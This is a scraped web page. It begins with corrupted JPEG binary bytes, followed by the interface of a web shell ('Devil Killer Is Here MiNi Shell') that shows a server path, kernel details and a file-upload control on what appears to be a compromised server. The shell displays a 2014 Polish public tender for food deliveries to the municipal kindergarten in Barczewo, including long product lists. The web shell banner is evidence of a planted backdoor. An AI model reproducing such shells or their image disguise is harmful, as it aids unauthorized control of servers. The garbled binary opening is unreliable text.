JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140627/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140627/215884-N-2014.html

<p class="kh_header"><b>Barczewo: ZAKUP DOSTAWA I ROZŁADUNEK ARTYKUŁÓW SPOŻYWCZYCH NA POTRZEBY PRZEDSZKOLA MIEJSKIEGO W BARCZEWIE</b><br>
<b>Numer ogłoszenia: 215884 - 2014; data zamieszczenia: 27.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Miejskie w Barczewie , ul. Słowackiego 7, 11-010 Barczewo, woj. warmińsko-mazurskie, tel. 89 5148396, faks 89 5148396.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP DOSTAWA I ROZŁADUNEK ARTYKUŁÓW SPOŻYWCZYCH NA POTRZEBY PRZEDSZKOLA MIEJSKIEGO W BARCZEWIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje 6 części:PM271.1.2014.Szczegółowy opis przedmiotu zamówienia dla poszczególnych częściCZĘŚĆ 1. Zakup, dostawa i rozładunek artykułów żywnościowych dla Przedszkola Miejskiego               w Barczewie
Artykuły ogólnospożywcze  CPV : 15.60.00.00-4;15.80.00.00.-6;15.82.00.00.-2;15.83.00.00-5;15.84.00.00-8;15.85.00.00.-1;  15.86.00-4;15.87.00.00-7;15.89.00.00-3;15.98.00.00-1;15.40.00.00.-2;15.33.00.00-0;03.14.25.00-3;
Lp. 	Nazwa asortymentu  	Jednostka miary
1.	Jaja kurze z chowu wolnowybiegowego klasa L	Szt	4500
2.	Makaron różne kształty w oryginalnych opakowaniach od400do500g pszenica zwyczjna	Kg	250
3.	Makaron drobny gwiazdki,muszelkiop.250-500g	Kg	24
4.	Płatki owsiane op500g	Kg	24
5.	Płatki jęczmienne op500g	Kg	18
6.	Kasza manna 1000g	Kg	24
7.	Kasza kukurydziana op.250-500g	Kg	18
8.	Kasza jaglana op.400-500g	Kg	24
9.	Kasza  jęczmienna średnia op.400-500g	Kg	56
10.	Kasza gryczana prażona op.400-1000g	Kg	45
11.	Kasza pęczak op.400-500g	Kg	6
12.	Mąka pszenna typ 550op.1000g	Kg	330
13.	Mąka ziemniaczana op.500-1000g	Kg	10
14.	Płatki ryżowe op.250-500g	Kg	24
15.	Ryż biały długoziarnisty op.1000g	Kg	90
16.	Płatki kukurydziane zwykłe zawierające co najmniej 90% mąki kukurydzianej op.250-1000g	Kg	14
17.	Płatki kukurydziane miodowe zawierajace co najmniej 90% mąki kukurydzianej op.250-1000g	Kg	14
18.	Cukier biały kryształ,pakowany op.1000g	Kg	530
19.	Dżem niskosłodzony różne smaki op.co najmniej370g	Szt	300
20.	Koncentrat pomidorowy30% op.co najmniej 190g	Szt	220
21.	Sól kuchenna jodowana biała,drobna op.1000g	Kg	100
22.	Sól morska drobnaop.1000g	Kg	10
23.	Kawa zbożowa rozpuszczalna składzboża72%(Jęczmień,żyto),cykoria,burak cukrowy-prażone.Op 150g	Szt	40
24.	Kakao prawdziwe op.100-200g	Kg	4
25.	Budyń w proszku różne smaki op.waga co najmniej 40g	Szt	380
26.	Kisiel owocowy w proszku bez cukru różne smaki waga co najmniej 40g	Szt	380
27.	Olej z pierwszego tłoczenia rzepakowy op.900-1000g	L	110
28.	Olej słonecznikowy op.900-1000g	L	30
29.	Makaron pełnoziarnisty op.500g	Kg	60
30.	Herbata owocowa,saszetki,pakowanaop.co najmniej 25x50g szt	Szt	100
31.	Herbata miętowa saszetki ,pakowana op.co najmniej20szt	Szt	60
32.	Herbata granulowanaop.100g	Szt	60
33.	Krakersy	Kg	20
34.	Biszkopty op.250-500g	Kg	60
35.	Ciastka kruche różne rodzaje op.od 1000-4000g	Kg	70
36.	Ciastka typu markizy op.co najmniej 1000g	Kg	15
37.	Woda źródlana niegazowana pakowana op.1500-5000g	L	700
38.	Keczup pomidorowy,łagodny w słoiku op.200g 60-65% koncentratu pom.	Szt	180
39.	Pieprz mielony prawdziwy bez dodatków w oryginalnych op.co najmniej 15g	Szt	90
40.	Pieprz ziołowy w oryginalnych opakowaniach	Szt	90
41.	Ziele angielskie w oryginalnych opakowaniach op.co najmniej14g	Szt	30
42.	Liść laurowy w oryginalnych opakowaniach	Szt	30
43.	Majonez słoik op.850g Skład: co najmniej 83% oleju rzepakowego.	szt	9
44.	Ogórek konserwowy w oryginalnych opakowaniach 0,9l słoik	Szt	30
45.	Kukurydz konserwowa puszka op.400g	Szt	15
46.	Szczaw krojony w oryginalnych opakowaniach waga co najmniej330g	szt	25
47.	Chrzan tarty słoik op.co najmniej170gz kwaskiem cytrynowym	Szt	15
48.	Koncentrat barszczu czerwonego w op. Szklanych op co najmniej 330g	szt	30
49.	Groszek konserwowy w puszce w oryginalnych op.400g	Szt	20
50.	Papryka mielona słodka w oryginalnych op.16g	Szt	30
51.	Przyprawa Curry op.20g	Szt	20
52.	Przyprawa Kurkuma  op.10-20g	Szt	20
53.	Majeranek otarty waga co najmniej 6g	szt	60
54.	Wafle suche prostokątne waga co najmniej 146g	Szt	170
55.	Nutella w oryginalnych op.600g lub produkt równoważny.	Szt	24
56.	Zioła prowansalskie w oryginalnych opakowaniach op.10g	szt	30
57.	Cukier waniliowy	szt	40
58.	Kwasek cytrynowyop.20g	Szt	30
59.	Musztarda słoik op.co najmniej 180g	szt	30
60.	Miód naturalny wielokwiatowy op.370g	Szt	50
61.	Ananas plastry puszka waga bez odcieku co najmniej 565g	szt	20
62.	Czekolada mleczna 100g	Szt	80
63.	Cukierki czekoladowe typu michałki lub równoważne	Kg	30
64.	Proszek do pieczenia	Szt 	15
65.	Sok owocowo-warzywny op.co najmniej 700ml	L	450
66.	Syrop owocowy 62%ekstraktu owocowego butelka szklana op.co najmniej420ml	szt	80
67.	Makrela w sosie pomidorowym bez warzyw op co najmnie 200g	Szt	40
68.	  Sałatka z makreli op co najmniej 150g	Szt	80
69.	Cukier puder op.co najmniej 500g	Kg	8
70.	Tymianek suszony waga co najmniej10g	Szt	25
71.	Oregano suszone waga co najmniej 10g	Szt	25
72	Fasola czerwona w puszce waga co najmniej 400g	szt	40
73	Olej z pierwszego tłoczenia rzepakowy z dodatkami(czosnek,bazylia,pomidory)op.co najmniej0,25l	L	10
74	Galaretka owocowa w proszku op.co najmniej75g	szt	50
75	Pomidory w puszce( z otwieraczem) op.co najmniej 400g	szt	140
76	Kawa zbożowa sypana op.co najmniej 200g	szt	30
77	Wafelki różne smaki(kakaowe,śmietankowe)	kg	40
78	Ryż brązowy op.400-1000g	kg	40CZĘŚĆ 2. Zakup, dostawa i rozładunek  mięsa i jego przetworów dla Przedszkola Miejskiego w Barczewie                                        CPV: 15.10.00.00-9;15.11.21.00-7
1.	Karkówka surowa wieprzowa bez kości	Kg	90
2.	Łopatka wieprzowa surowa bez kości	Kg	250
3.	Wołowina surowa ligawa	Kg	45
4.	Szynka wieprzowa surowa bez kości,bez skóry	Kg	120
5.	Filet z indyka surowy	Kg	160
6.	Filet z kurczaka surowy	Kg	250
7.	Schab bez kości surowy wieprzowy	Kg	110
8.	Udka bez grzbietu z kurczaka surowe	Kg	250
9.	Antrykot wołowy surowy	Kg	20
10.	Żebra wołowe surowe	Kg	20
11.	Porcje rosołowe z kurczaka	Kg	100
12.	Wątróbka drobiowa surowa	Kg	40
13.	Parówki wp. cienkie o zwartości co najmniej71% mięsa wp.	Kg	70
14.	Parówki drobiowe cienkie o zawartości mięsa co najmniej 60%	Kg	35
15.	Polędwica sopocka	kg	40
16.	Szynka wędzona parzona  mieso wp. 100%	kg	50
17.	Kiełbasa żywiecka sucha 	Kg	25
18.	Kiełbasa szynkowa drobiowa o zawartości mięsa co najmniej 60%	Kg	40
19.	Kiełbasa krakowska sucha	Kg	30
20.	Kiełbasa wp. cienka zawierajaca  co najmniej 63% mięsa wp.	kg	40
21.	Filet wędzony z indyka o zawartości mięsa co najmiej 90%	Kg	45
22.	Kiełbasa szynkowa wp. parzona	Kg	45
23.	Łopatka pieczona zawartość mięsa co najmniej 90%	kg	30
24.	Pasztet pieczony drobiowy zawierający co najmniej30% mięsa z kury	kg	35
25	Pasztet pieczony wp zawierający co najmniej 30% mięsa wp.	kg	35
26	Szynka wp.gotowana  o zawartości mięsa co najmniej 80%	kg	30
27	Szynka wiejska	kg	25
28	Smalec wp. kostka 200-250g	Kg	20
29	Boczek wędzony parzony	Kg	20
			
CZĘŚĆ 3. Zakup, dostawa i rozładunek ziemniaków,warzyw,jarzyn,owoców, owoców tropikalnych,orzechów.1.	Ziemniaki 	kg	3500
2.	Marchew świeża korzeń	kg	300
3.	Pietruszka świeża korzeń	kg	150
4.	Cebula biała	kg	140
5.	Cebula czerwona	kg	40
6.	Seler świeży korzeń	kg	120
7.	Por świeży	kg	180
8.	Kapusta czerwona świeża	kg	120
9.	Pieczarki świeże 	kg	80
10.	Czosnek kraj pochodzenie polska głowka 	szt	100
11.	Szczypior świeży pęczek	szt	500
12.	Rzodkiewka pęczek	szt	400
13.	Rzodkiew biała świeża	Kg	40
14	Sałata lodowa ,pakowana główka	szt	80
15	Sałata  zielona świeża główka	Szt	180
16	Pomidory czerwone, świeże	kg	250
17	Ogórek św.szklarniowy	kg	70
18	Ogórek swieży,zielony gruntowy	kg	70
19	Ogórek kwaszony	Kg	80
20	Kapusta kwaszona biała	kg	120
21	Kapusta pekinska 	kg	40
22	Kapusta biała słodka  główka	kg	150
23	Papryka czerwona ,żółta,zielona	kg	30
24	Cytryna świeża	Kg	40
25	Jabłka świeże	kg	1200
26	Banany świeże	kg	360
27	Gruszki świeże	kg	120
28	kiwi	Kg	70
29	Mandarynki  świeże	kg	450
30	Winogrona zielone bezpestkowe	kg	60
31	Śliwka fioletowa duża	kg	60
32	Brzoskwinie	kg	60
33	Winogrona granatowe	kg	40
34	Koper zielony,świeży pęczek 100g	Szt	300
35	Natka pietruszki świeza pęczek  100g	szt	300
36	Burak czerwony świeży	Kg	220
37	Rodzynki op.co najmniej 100g-150g	kg	3
38	Orzechy włoskie łuskane op.co najmniej100g	kg	2
39	Fasola sucha średnia  op.400-1000g	Kg	30
40	Groch połówki op. 400-1000g	kg	30
41	Pietruszka suszona natka op.50-100g	kg	3
42	Włoszczyzna suszona op.100-200g	kg	3
43	Koper zielony suszony op 50-100g	kg	2
44	Pestki słonecznika op.50-150g	kg	6
45	Żurawina suszona op.250-500g	kg	6
46	Cebulka suszona op.50-100g	kg	2
CZĘŚĆ 4. Zakup, dostawa i rozładunek  mrożonek dla Przedszkola Miejskiego w Barczewie(ryby przetworzone,warzywa i owoce mrożone) PCV 15.20.00.00-0;15.33.11.70-9,15.89.60.00-5;15.89.43.00-4)  1.	Włoszczyzna4-składnikowa(marchew,por,seler,pietruszka)op.2000-2500g)	kg	500
2.	Mieszanka 7-składnikowa z kapusta 2000-2500g	kg	140
3.	Brokuły mrożone 450g-2500g	kg	90
4.	Kalafior mrożony op.450-2500g	kg	90
5	Fasolka szparagowa żółta cięta op.450-2500g	kg	90
6	Fasolka szparagowa zielona cieta op.450-2500g	kg	90
7	Szpinak mrożony mielony.op.450-2500g	Kg	90
8 	Groszek zielony mrożony op.450-2500g	kg	50
9	Barszcz ukraiński skład:burak (ćwikłowy,kapusta,fasola,marchew,pomidor,seler,cebula)op.450-2500g	kg	60
10	Mieszanka kompotowa 5-składnikowa z truskawką op.450-2500g 	Kg	300
11	Mieszanka kompotowa 5-składnikowa(ananas,porzeczka czerwona,porzeczka czarna,rabarbar,truskawka) lub równoważna	kg	350
12	Truskawka mrożona op.450-2500g	Kg	100
13	Bukiet warzyw (brokuł,kalafior,marchew)op.450-2500g	Kg	150
14	Warzywa na patelnie (skład:cukinia,fasola,kalafior romanescu,marchew,papryka,cebula,kukurydza)op.450-2500g	kg	150
15	Marchew kostka op.450-2500g	kg	150
16	Marchew z groszkiem op.450-2500g	Kg	150
17	Wiśnia b)p op.450-2500g	Kg	60
18	Porzeczka czarna mrożona op.450-2500g	kg	60
19	Dorsz filet SHP	kg	90
20	Miruna filet SHP	kg	90
21	Morszczuk filet SHP	kg	80
22	Panga filet	kg	30
23	Makrela wędzona	Kg	48
24	Włoszczyzna 3-składnikowa paski op.450-2500g	Kg	100
25	Pyzy z mięsem op.500-1000g mrożone	kg	50
26	Pierogi z truskawkami op.500-1000g mrożone	kg	50
27 	Ryba sola filet mrożona	kg	30
28	Pierogi z jagodami mrożone op500-1000g	kg	50
29	Mieszanka kompotowa z owoców leśnych op2000-2500g	kg	50
  CZĘŚĆ 5. Zakup, dostawa i rozładunek produktów mleczarskich do Przedszkola Miejskiego w Barczewie PCV 15.50.00.00-3 1.	Mleko folia 2%op.1000ml	L	5000
2.	Serek topiony o smaku śmietankowym kostka 100g	szt	240
3.	Mleko UHT op.1000ml 2%	L	100
4.	Mleko UHT op.1000ml 3,2%	L	50
5.	Masło ekstra zawierajace co najmniej 82% tłuszczu	kg	220
6.	Jogurt wielosmakowy,waga op.co najmniej150g	szt	1000
7.	Serek homogenizowany wanilia op.co najmniej 135g	szt	800
8.	 Deser waniliowy pakowany op. co najmniej120g	szt	200
9.	Jogurt z kawałkami owoców,waga op.co najmnie150g	szt	800
10.	Jogurt owocowy  do picia   op.co najmniej   125 ml	L	180
11	Ser żółty  typu salami  (nie dopuszcza się produktu seropodobnego)	kg	30
12	Ser żółty typu gouda (nie dopuszcza się produktu seropodobnego)	kg	30
13	Śmietana 12% op.200-400g	L	250
14	Śmietana 18% op.200-400g	L	200
15	Twaróg krajanka półtłusty	kg	300
16	Jogurt naturalny op. co najmniej 400ml	L	45
17	Serek topiony kostka 100g z szynką	Szt 	60
                               			
CZĘŚĆ 6. Zakup, dostawa i rozładunek pieczywa dla Przedszkola Miejskiego w Barczewie PCV :15.81.00.00-91.	Chleb pszenno-żytni krojony foliowany waga co najmniej500g	Szt.	1000	2	Chleb razowy krojony foliowany waga co najmniej  400g	szt	1000
3	Bułki kajzerki waga co najmniej 50g	szt	1500
4	Bułka grahamka waga co najmniej 50-90g	szt	1400
5	Chleb wieloziarnisty zawartość minimum 3-ziarna(siemię lniane,słonecznik obowiązkowo,pozostałe dowolne) waga co najmniej 400-500g	szt	180
6	Ciasto drożdżowe	kg	80
7	Chałka zdobna co najmniej 300g	szt	300
8	Babka piaskowa	Kg	70
9	Rogaliki krucho -drożdżowe nadziewane	kg	130
10	Bułki  maślane waga co najmniej 50g	szt	1000
11	Bułki czerstwe  waga co najmniej waga 50g	szt	400
12	Bułka tarta	kg	50
13	Chleb wiejski krojony	szt	100
14	Piernik przekładany	Kg	30
15	Chleb żytni krojony	szt	130
16	Paszteciki z kapustą i grzybami	kg	28
17	Rogale z makiem waga co najmniej 50g	szt	500.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przedszkolebarczewo.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Miejskie w Barczewie ul.Słowackiego 7 11-010 Barczewo pokój nr 104w godz.8:00-12:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.07.2014 godzina 12:00, miejsce: Przedszkole Miejskie w Barczewieul. Słowackiego7 11-010 Barczewo pokój nr104.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ 1. Zakup, dostawa i rozładunek artykułów żywnościowych dla Przedszkola Miejskiego               w Barczewie
Artykuły ogólnospożywcze  CPV : 15.60.00.00-4;15.80.00.00.-6;15.82.00.00.-2;15.83.00.00-5;15.84.00.00-8;15.85.00.00.-1;  15.86.00-4;15.87.00.00-7;15.89.00.00-3;15.98.00.00-1;15.40.00.00.-2;15.33.00.00-0;03.14.25.00-3;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 1. Zakup, dostawa i rozładunek artykułów żywnościowych dla Przedszkola Miejskiego               w Barczewie
Artykuły ogólnospożywcze  CPV : 15.60.00.00-4;15.80.00.00.-6;15.82.00.00.-2;15.83.00.00-5;15.84.00.00-8;15.85.00.00.-1;  15.86.00-4;15.87.00.00-7;15.89.00.00-3;15.98.00.00-1;15.40.00.00.-2;15.33.00.00-0;03.14.25.00-3;
1.	Jaja kurze z chowu wolnowybiegowego klasa L	Szt	4500
2.	Makaron różne kształty w oryginalnych opakowaniach od400do500g pszenica zwyczjna	Kg	250
3.	Makaron drobny gwiazdki,muszelkiop.250-500g	Kg	24
4.	Płatki owsiane op500g	Kg	24
5.	Płatki jęczmienne op500g	Kg	18
6.	Kasza manna 1000g	Kg	24
7.	Kasza kukurydziana op.250-500g	Kg	18
8.	Kasza jaglana op.400-500g	Kg	24
9.	Kasza  jęczmienna średnia op.400-500g	Kg	56
10.	Kasza gryczana prażona op.400-1000g	Kg	45
11.	Kasza pęczak op.400-500g	Kg	6
12.	Mąka pszenna typ 550op.1000g	Kg	330
13.	Mąka ziemniaczana op.500-1000g	Kg	10
14.	Płatki ryżowe op.250-500g	Kg	24
15.	Ryż biały długoziarnisty op.1000g	Kg	90
16.	Płatki kukurydziane zwykłe zawierające co najmniej 90% mąki kukurydzianej op.250-1000g	Kg	14
17.	Płatki kukurydziane miodowe zawierajace co najmniej 90% mąki kukurydzianej op.250-1000g	Kg	14
18.	Cukier biały kryształ,pakowany op.1000g	Kg	530
19.	Dżem niskosłodzony różne smaki op.co najmniej370g	Szt	300
20.	Koncentrat pomidorowy30% op.co najmniej 190g	Szt	220
21.	Sól kuchenna jodowana biała,drobna op.1000g	Kg	100
22.	Sól morska drobnaop.1000g	Kg	10
23.	Kawa zbożowa rozpuszczalna składzboża72%(Jęczmień,żyto),cykoria,burak cukrowy-prażone.Op 150g	Szt	40
24.	Kakao prawdziwe op.100-200g	Kg	4
25.	Budyń w proszku różne smaki op.waga co najmniej 40g	Szt	380
26.	Kisiel owocowy w proszku bez cukru różne smaki waga co najmniej 40g	Szt	380
27.	Olej z pierwszego tłoczenia rzepakowy op.900-1000g	L	110
28.	Olej słonecznikowy op.900-1000g	L	30
29.	Makaron pełnoziarnisty op.500g	Kg	60
30.	Herbata owocowa,saszetki,pakowanaop.co najmniej 25x50g szt	Szt	100
31.	Herbata miętowa saszetki ,pakowana op.co najmniej20szt	Szt	60
32.	Herbata granulowanaop.100g	Szt	60
33.	Krakersy	Kg	20
34.	Biszkopty op.250-500g	Kg	60
35.	Ciastka kruche różne rodzaje op.od 1000-4000g	Kg	70
36.	Ciastka typu markizy op.co najmniej 1000g	Kg	15
37.	Woda źródlana niegazowana pakowana op.1500-5000g	L	700
38.	Keczup pomidorowy,łagodny w słoiku op.200g 60-65% koncentratu pom.	Szt	180
39.	Pieprz mielony prawdziwy bez dodatków w oryginalnych op.co najmniej 15g	Szt	90
40.	Pieprz ziołowy w oryginalnych opakowaniach	Szt	90
41.	Ziele angielskie w oryginalnych opakowaniach op.co najmniej14g	Szt	30
42.	Liść laurowy w oryginalnych opakowaniach	Szt	30
43.	Majonez słoik op.850g Skład: co najmniej 83% oleju rzepakowego.	szt	9
44.	Ogórek konserwowy w oryginalnych opakowaniach 0,9l słoik	Szt	30
45.	Kukurydz konserwowa puszka op.400g	Szt	15
46.	Szczaw krojony w oryginalnych opakowaniach waga co najmniej330g	szt	25
47.	Chrzan tarty słoik op.co najmniej170gz kwaskiem cytrynowym	Szt	15
48.	Koncentrat barszczu czerwonego w op. Szklanych op co najmniej 330g	szt	30
49.	Groszek konserwowy w puszce w oryginalnych op.400g	Szt	20
50.	Papryka mielona słodka w oryginalnych op.16g	Szt	30
51.	Przyprawa Curry op.20g	Szt	20
52.	Przyprawa Kurkuma  op.10-20g	Szt	20
53.	Majeranek otarty waga co najmniej 6g	szt	60
54.	Wafle suche prostokątne waga co najmniej 146g	Szt	170
55.	Nutella w oryginalnych op.600g lub produkt równoważny.	Szt	24
56.	Zioła prowansalskie w oryginalnych opakowaniach op.10g	szt	30
57.	Cukier waniliowy	szt	40
58.	Kwasek cytrynowyop.20g	Szt	30
59.	Musztarda słoik op.co najmniej 180g	szt	30
60.	Miód naturalny wielokwiatowy op.370g	Szt	50
61.	Ananas plastry puszka waga bez odcieku co najmniej 565g	szt	20
62.	Czekolada mleczna 100g	Szt	80
63.	Cukierki czekoladowe typu michałki lub równoważne	Kg	30
64.	Proszek do pieczenia	Szt 	15
65.	Sok owocowo-warzywny op.co najmniej 700ml	L	450
66.	Syrop owocowy 62%ekstraktu owocowego butelka szklana op.co najmniej420ml	szt	80
67.	Makrela w sosie pomidorowym bez warzyw op co najmnie 200g	Szt	40
68.	  Sałatka z makreli op co najmniej 150g	Szt	80
69.	Cukier puder op.co najmniej 500g	Kg	8
70.	Tymianek suszony waga co najmniej10g	Szt	25
71.	Oregano suszone waga co najmniej 10g	Szt	25
